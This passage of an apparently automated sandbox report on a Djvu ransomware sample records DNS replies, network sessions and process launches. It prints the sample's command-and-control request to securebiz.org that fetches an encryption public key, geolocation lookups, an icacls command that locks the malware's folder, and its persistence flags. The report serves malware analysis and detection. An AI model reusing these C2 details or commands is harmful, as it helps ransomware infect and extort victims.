                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org210.92.250.133A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org180.69.193.102A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org189.232.18.171A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org190.147.156.126A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org58.124.228.242A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org211.168.197.211A (IP address)IN (0x0001)
                                                                                    Oct 4, 2021 12:30:26.199101925 CEST8.8.8.8192.168.2.30xf036No error (0)securebiz.org138.36.3.134A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • api.2ip.ua
                                                                                    • securebiz.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.34975077.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.34975177.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.34975277.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.34975377.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.34975677.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    5192.168.2.349757123.213.233.19480C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Oct 4, 2021 12:30:26.466541052 CEST1093OUTGET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: securebiz.org
                                                                                    Oct 4, 2021 12:30:27.236531019 CEST1094INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:29:27 GMT
                                                                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                    X-Powered-By: PHP/5.6.40
                                                                                    Content-Length: 558
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 56 5a 35 38 34 38 74 2b 6a 53 36 67 57 49 46 6b 49 57 4f 5c 5c 6e 4a 4f 54 45 45 38 2b 45 6a 5a 34 36 63 5c 2f 5c 2f 33 35 37 48 79 6a 6d 34 46 72 6b 63 78 34 65 61 43 39 6a 6a 34 47 6c 5a 59 72 32 35 58 65 67 73 59 74 41 48 46 7a 7a 66 57 68 67 30 4c 73 53 64 52 5c 5c 6e 4e 62 5a 73 49 4b 35 6c 42 56 30 44 4a 76 79 35 36 38 55 45 73 6e 51 61 6a 63 36 48 34 62 74 6c 5c 2f 37 61 68 35 52 53 4c 47 6a 6c 6e 61 42 43 75 30 6a 6b 2b 4b 68 57 4b 75 41 4a 41 49 56 33 72 5c 5c 6e 6f 48 58 71 54 61 42 6b 4f 35 78 36 69 2b 65 34 52 34 31 4d 70 6a 38 6b 58 75 59 50 67 45 72 46 31 54 4a 58 55 6d 48 4d 69 57 63 59 4d 6e 33 78 6d 58 43 6e 71 54 33 5c 2f 56 54 78 34 64 46 56 41 5c 5c 6e 73 59 43 5a 58 2b 5a 30 75 41 79 44 42 75 2b 70 44 4d 34 73 4a 47 71 36 6b 45 45 6f 58 56 70 4c 46 46 6d 4c 50 58 64 4c 50 6e 75 4a 74 32 72 4c 7a 5a 4f 6f 4a 75 55 4f 4f 7a 31 36 39 56 44 4c 5c 5c 6e 6f 4c 78 36 55 6f 4c 50 35 79 4f 75 31 49 48 67 5a 4d 33 66 53 4b 6e 6d 33 46 79 62 66 74 51 77 6c 32 50 39 35 67 33 2b 34 36 49 63 6f 30 65 77 52 37 67 4d 43 79 33 67 52 53 35 54 58 45 46 36 5c 5c 6e 7a 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 61 4e 39 63 42 76 73 47 4d 58 75 73 76 65 31 73 42 6f 55 72 45 45 31 71 37 66 74 74 6c 58 58 39 57 43 5a 42 6b 45 6b 77 22 7d
                                                                                    Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0VZ5848t+jS6gWIFkIWO\\nJOTEE8+EjZ46c\/\/357Hyjm4Frkcx4eaC9jj4GlZYr25XegsYtAHFzzfWhg0LsSdR\\nNbZsIK5lBV0DJvy568UEsnQajc6H4btl\/7ah5RSLGjlnaBCu0jk+KhWKuAJAIV3r\\noHXqTaBkO5x6i+e4R41Mpj8kXuYPgErF1TJXUmHMiWcYMn3xmXCnqT3\/VTx4dFVA\\nsYCZX+Z0uAyDBu+pDM4sJGq6kEEoXVpLFFmLPXdLPnuJt2rLzZOoJuUOOz169VDL\\noLx6UoLP5yOu1IHgZM3fSKnm3FybftQwl2P95g3+46Ico0ewR7gMCy3gRS5TXEF6\\nzQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw"}


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.34975077.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-04 10:29:57 UTC0OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:29:57 UTC0INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:29:57 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:29:57 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:29:57 UTC0INData Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.34975177.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-04 10:30:09 UTC1OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:09 UTC1INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:09 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:09 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:09 UTC1INData Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.34975277.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-04 10:30:16 UTC2OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:16 UTC2INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:16 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:16 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:16 UTC2INData Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.34975377.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-04 10:30:16 UTC3OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:17 UTC3INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:16 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:16 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:17 UTC3INData Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.34975677.123.139.190443C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-04 10:30:25 UTC4OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2021-10-04 10:30:25 UTC4INHTTP/1.1 200 OK
                                                                                    Date: Mon, 04 Oct 2021 10:30:25 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Cache-Control: max-age=15552000
                                                                                    Expires: Sat, 02 Apr 2022 10:30:25 GMT
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: application/json
                                                                                    2021-10-04 10:30:25 UTC4INData Raw: 31 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 35 37 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 34 30 5c 75 30 34 33 33 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34
                                                                                    Data Ascii: 1bf{"ip":"102.129.143.57","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Virginia","region_rus":"\u0412\u0438\u0440\u0433\u0438\u043d\u0438\u044f","region_ua":"\u04


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 4332 Parent PID: 6136

                                                                                    General

                                                                                    Start time:12:29:46
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 752 Parent PID: 4332

                                                                                    General

                                                                                    Start time:12:29:53
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: icacls.exe PID: 6824 Parent PID: 752

                                                                                    General

                                                                                    Start time:12:29:57
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                    Imagebase:0xe80000
                                                                                    File size:29696 bytes
                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 5344 Parent PID: 752

                                                                                    General

                                                                                    Start time:12:29:58
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 1376 Parent PID: 664

                                                                                    General

                                                                                    Start time:12:29:59
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 56%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 7112 Parent PID: 5344

                                                                                    General

                                                                                    Start time:12:30:06
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\Desktop\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 4340 Parent PID: 3352

                                                                                    General

                                                                                    Start time:12:30:07
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 5608 Parent PID: 1376

                                                                                    General

                                                                                    Start time:12:30:13
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
                                                                                    MD5 hash:550B59B69EBFD6DDA6B55725245B46AD
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: NZPC0PFaC0.exe PID: 6880 Parent PID: 4340

                                                                                    General

                                                                                    Start time:12:30:14
                                                                                    Start date:04/10/2021
                                                                                    Path:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:833536 bytes
